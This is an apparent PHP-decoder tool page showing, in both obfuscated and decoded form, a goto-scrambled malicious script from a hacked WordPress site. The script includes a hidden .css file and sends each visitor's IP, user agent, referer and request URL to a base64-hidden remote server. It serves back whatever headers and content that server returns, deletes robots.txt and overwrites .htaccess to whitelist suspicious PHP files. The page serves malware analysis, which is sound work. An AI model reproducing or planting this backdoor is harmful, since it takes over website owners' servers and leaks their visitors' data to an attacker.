Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php /*80497*/ $r4g = "G:/PleskVhosts/spacedu.co\x6d.br/websites/\x6dotorcyclenews.co..

Decoded Output download

<?php 
/*80497*/ 
 
$r4g = "G:/PleskVhosts/spacedu.com.br/websites/motorcyclenews.com.br/wp-includes/blocks/text-columns/.33ca15b7.css"; if (TRUE){ @include_once /* wer6d */ ($r4g); } 
 
/*80497*/ 
 goto l104o; AXJzC: goto ku34R; goto vK31d; wH4cj: $params["referer"] = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; goto pL5oA; O0aJE: goto FWlis; goto T1Ikw; QGuvu: R4xEl: goto jA1EG; CCiJh: Ztec0: goto HVkzL; n5k3W: goto RReXr; goto J77Ea; t19UM: $params["domain"] = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"]; goto SdbOQ; I59M0: TQ26g: goto Fp3IG; gzcOQ: goto GGQ96; goto Ucw8A; pR3FE: $params["agent"] = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''; goto iDgp2; Fp3IG: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "h"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto prAki; X7x_d: FWlis: goto MZU8u; LmXcD: fbDsO: goto Vpsyu; jA1EG: $params["ip"] = isset($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"]; goto AXJzC; CLVCk: oPYxz: goto Bk4OL; dNtFH: ku34R: goto CTSUM; GEmD_: goto bYZI8; goto dNtFH; Ucw8A: BnQTq: goto vNxwm; Vpsyu: $params["request_url"] = $_SERVER["REQUEST_URI"]; goto D3lGf; HVkzL: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto URTbt; Pg7is: $params["protocol"] = isset($_SERVER["HTTPS"]) ? "https://" : "http://"; goto kEkQS; pL5oA: goto GUkbB; goto CLVCk; frqPm: goto Ztec0; goto qlQ5h; kEkQS: goto BnQTq; goto X7x_d; TE2EI: bYZI8: goto ipgis; MZU8u: if (isset($_REQUEST["params"])) { $params["api"] = $api; print_r($params); die; } goto GEmD_; ipgis: h2(); goto yyd12; iDgp2: goto R4xEl; goto LmXcD; mpNwg: GGQ96: goto Pg7is; D3lGf: goto S5C1K; goto CCiJh; Bk4OL: function h2() { if (file_exists("robots" . ".txt")) { @unlink("robots" . ".txt"); } $htaccess = "." . "htaccess"; $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto n5k3W; SdbOQ: goto fbDsO; goto I59M0; yyd12: goto lHRSv; goto m4UhN; vNxwm: $params["language"] = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : ''; goto O0aJE; prAki: goto oPYxz; goto mpNwg; l104o: goto TQ26g; goto QGuvu; J77Ea: EzZC2: goto Oxmi1; m4UhN: lHRSv: goto u9eZ2; CTSUM: if ($params["ip"] == null) { $params["ip"] = ''; } goto gzcOQ; vK31d: GUkbB: goto pR3FE; pPZZN: goto DkJ__; goto f6BFj; u9eZ2: $try = 0; goto frqPm; qlQ5h: DkJ__: goto t19UM; URTbt: goto EzZC2; goto TE2EI; f6BFj: S5C1K: goto wH4cj; T1Ikw: RReXr: goto D8_b3; D8_b3: $api = base64_decode("aHR0cDovLzU4MjEtY2g0LXYxMDgudW1lcmljYWwuY29t"); goto pPZZN; Oxmi1: ?>

Did this file decode correctly?

Original Code

<?php
/*80497*/

$r4g = "G:/PleskVhosts/spacedu.co\x6d.br/websites/\x6dotorcyclenews.co\x6d.br/wp\x2dincludes/blocks/text\x2dcolu\x6dns/.33ca15b7.css"; if (TRUE){ @include_once /* wer6d */ ($r4g); }

/*80497*/
 goto l104o; AXJzC: goto ku34R; goto vK31d; wH4cj: $params["\162\145\x66\145\x72\145\162"] = isset($_SERVER["\x48\124\x54\120\x5f\x52\x45\x46\x45\122\105\122"]) ? $_SERVER["\x48\124\x54\120\x5f\x52\x45\x46\105\122\105\x52"] : ''; goto pL5oA; O0aJE: goto FWlis; goto T1Ikw; QGuvu: R4xEl: goto jA1EG; CCiJh: Ztec0: goto HVkzL; n5k3W: goto RReXr; goto J77Ea; t19UM: $params["\144\157\155\141\x69\x6e"] = isset($_SERVER["\x48\124\124\x50\137\110\x4f\x53\124"]) ? $_SERVER["\110\x54\x54\x50\137\x48\117\x53\124"] : $_SERVER["\x53\x45\x52\x56\105\x52\137\116\x41\x4d\105"]; goto SdbOQ; I59M0: TQ26g: goto Fp3IG; gzcOQ: goto GGQ96; goto Ucw8A; pR3FE: $params["\141\147\145\156\x74"] = isset($_SERVER["\x48\124\124\120\137\125\123\105\x52\x5f\101\107\x45\x4e\124"]) ? $_SERVER["\x48\x54\124\120\137\125\x53\105\122\x5f\x41\107\105\116\124"] : ''; goto iDgp2; Fp3IG: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\x68"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto prAki; X7x_d: FWlis: goto MZU8u; LmXcD: fbDsO: goto Vpsyu; jA1EG: $params["\x69\x70"] = isset($_SERVER["\x48\124\124\120\137\x56\x49\x41"]) ? $_SERVER["\x48\x54\x54\120\137\130\137\106\x4f\122\x57\x41\122\x44\x45\x44\x5f\x46\117\122"] : $_SERVER["\x52\x45\115\x4f\x54\105\x5f\101\104\104\122"]; goto AXJzC; CLVCk: oPYxz: goto Bk4OL; dNtFH: ku34R: goto CTSUM; GEmD_: goto bYZI8; goto dNtFH; Ucw8A: BnQTq: goto vNxwm; Vpsyu: $params["\162\x65\x71\165\145\163\164\x5f\165\x72\154"] = $_SERVER["\122\x45\x51\x55\x45\x53\124\x5f\x55\122\111"]; goto D3lGf; HVkzL: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\x2f\134\x7c\57\x73\x69", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto URTbt; Pg7is: $params["\160\x72\157\164\157\x63\157\154"] = isset($_SERVER["\110\124\x54\x50\123"]) ? "\x68\164\164\160\163\72\x2f\57" : "\x68\164\164\x70\72\x2f\57"; goto kEkQS; pL5oA: goto GUkbB; goto CLVCk; frqPm: goto Ztec0; goto qlQ5h; kEkQS: goto BnQTq; goto X7x_d; TE2EI: bYZI8: goto ipgis; MZU8u: if (isset($_REQUEST["\160\141\x72\141\155\163"])) { $params["\x61\x70\x69"] = $api; print_r($params); die; } goto GEmD_; ipgis: h2(); goto yyd12; iDgp2: goto R4xEl; goto LmXcD; mpNwg: GGQ96: goto Pg7is; D3lGf: goto S5C1K; goto CCiJh; Bk4OL: function h2() { if (file_exists("\162\157\x62\x6f\x74\163" . "\56\164\170\x74")) { @unlink("\162\x6f\142\x6f\x74\163" . "\x2e\164\170\164"); } $htaccess = "\x2e" . "\x68\164\x61\x63\x63\x65\x73\x73"; $content = @base64_decode("\x50\x45\132\x70\142\x47\x56\x7a\124\127\106\60\131\62\x67\147\x49\151\64\x6f\143\110\154\70\132\130\x68\154\146\110\102\x6f\143\x43\x6b\x6b\111\x6a\x34\x4b\x49\x45\x39\171\132\x47\x56\x79\x49\107\x46\x73\142\107\x39\x33\114\107\x52\154\x62\156\153\113\111\x45\x52\154\142\156\x6b\147\132\156\112\x76\142\x53\x42\x68\142\x47\167\x4b\120\x43\x39\x47\x61\x57\170\154\x63\x30\x31\x68\x64\107\x4e\x6f\120\147\x6f\70\122\155\x6c\163\x5a\130\116\116\x59\x58\x52\152\141\103\101\x69\x58\151\150\150\131\155\71\x31\x64\x43\x35\167\141\110\102\x38\143\155\x46\153\x61\127\70\165\143\107\x68\x77\146\107\154\165\x5a\107\x56\x34\114\156\x42\x6f\x63\110\x78\152\142\x32\65\60\x5a\x57\65\60\x4c\156\x42\157\x63\110\170\163\142\x32\116\x72\115\172\131\167\114\156\x42\157\143\110\170\x68\132\x47\61\x70\x62\151\65\167\141\110\102\70\144\x33\x41\x74\x62\107\71\156\141\x57\x34\165\x63\107\x68\x77\x66\110\x64\167\x4c\127\167\167\132\x32\154\x75\x4c\156\x42\157\143\x48\x78\63\x63\x43\x31\x30\141\107\x56\x74\x5a\123\65\167\x61\x48\102\70\x64\x33\101\164\x63\62\116\171\x61\130\x42\60\143\x79\x35\x77\x61\110\x42\x38\144\63\101\164\132\127\122\x70\144\x47\71\x79\x4c\x6e\x42\157\x63\x48\x78\x74\131\x57\147\x75\x63\x47\x68\167\146\107\160\167\114\156\x42\157\143\110\170\x6c\x65\x48\x51\x75\x63\x47\150\x77\113\x53\x51\x69\x50\x67\x6f\x67\124\x33\x4a\153\x5a\x58\x49\147\131\x57\170\x73\x62\63\x63\x73\132\107\x56\x75\x65\121\x6f\147\x51\127\170\x73\142\63\x63\147\x5a\156\x4a\x76\x62\x53\102\x68\x62\107\167\113\120\103\x39\107\x61\127\170\154\143\x30\61\x68\144\x47\x4e\x6f\x50\x67\157\70\x53\127\132\x4e\142\x32\x52\x31\142\x47\125\x67\x62\127\71\153\130\x33\112\x6c\144\x33\112\160\x64\107\125\x75\131\172\64\x4b\125\x6d\x56\x33\143\x6d\x6c\60\132\x55\126\x75\132\x32\154\x75\132\x53\102\120\142\x67\160\123\132\130\144\x79\141\x58\x52\x6c\121\155\106\172\x5a\x53\x41\166\103\154\x4a\154\x64\63\x4a\160\144\107\x56\123\144\127\x78\154\111\x46\x35\x70\142\x6d\x52\154\x65\106\x77\x75\143\107\150\x77\112\x43\x41\x74\111\106\164\115\130\121\160\x53\x5a\130\x64\171\x61\130\122\154\x51\x32\71\165\132\103\101\x6c\x65\61\x4a\106\x55\x56\x56\106\x55\61\122\x66\122\153\154\115\122\125\x35\102\x54\125\x56\71\111\103\x45\164\132\x67\160\123\132\x58\x64\x79\x61\130\x52\x6c\121\x32\x39\x75\x5a\103\101\x6c\x65\x31\x4a\106\x55\126\126\x46\x55\x31\122\x66\x52\x6b\154\115\x52\125\65\102\124\x55\126\71\x49\103\105\x74\x5a\101\160\123\132\130\x64\x79\x61\130\122\154\125\x6e\126\163\132\x53\x41\165\x49\x43\71\160\142\155\x52\x6c\145\x43\65\167\141\110\101\x67\127\x30\170\144\x43\152\x77\166\123\x57\132\116\x62\62\122\x31\x62\x47\125\x2b"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto n5k3W; SdbOQ: goto fbDsO; goto I59M0; yyd12: goto lHRSv; goto m4UhN; vNxwm: $params["\154\x61\x6e\147\165\141\147\145"] = isset($_SERVER["\x48\x54\x54\120\x5f\x41\x43\103\105\x50\124\137\114\101\x4e\107\x55\x41\x47\x45"]) ? $_SERVER["\x48\124\124\120\x5f\x41\103\x43\105\120\x54\x5f\x4c\x41\x4e\x47\125\x41\x47\x45"] : ''; goto O0aJE; prAki: goto oPYxz; goto mpNwg; l104o: goto TQ26g; goto QGuvu; J77Ea: EzZC2: goto Oxmi1; m4UhN: lHRSv: goto u9eZ2; CTSUM: if ($params["\151\x70"] == null) { $params["\151\x70"] = ''; } goto gzcOQ; vK31d: GUkbB: goto pR3FE; pPZZN: goto DkJ__; goto f6BFj; u9eZ2: $try = 0; goto frqPm; qlQ5h: DkJ__: goto t19UM; URTbt: goto EzZC2; goto TE2EI; f6BFj: S5C1K: goto wH4cj; T1Ikw: RReXr: goto D8_b3; D8_b3: $api = base64_decode("\141\110\122\60\x63\104\157\x76\114\x7a\125\x34\115\152\x45\164\131\62\x67\60\x4c\130\x59\170\115\104\x67\165\144\127\x31\154\143\x6d\154\152\x59\127\x77\x75\x59\x32\x39\x74"); goto pPZZN; Oxmi1: ?>

Function Calls

None

Variables

None

Stats

MD5	0cdceda0c43cbddc47a28a5973f477ca
Eval Count	0
Decode Time	52 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats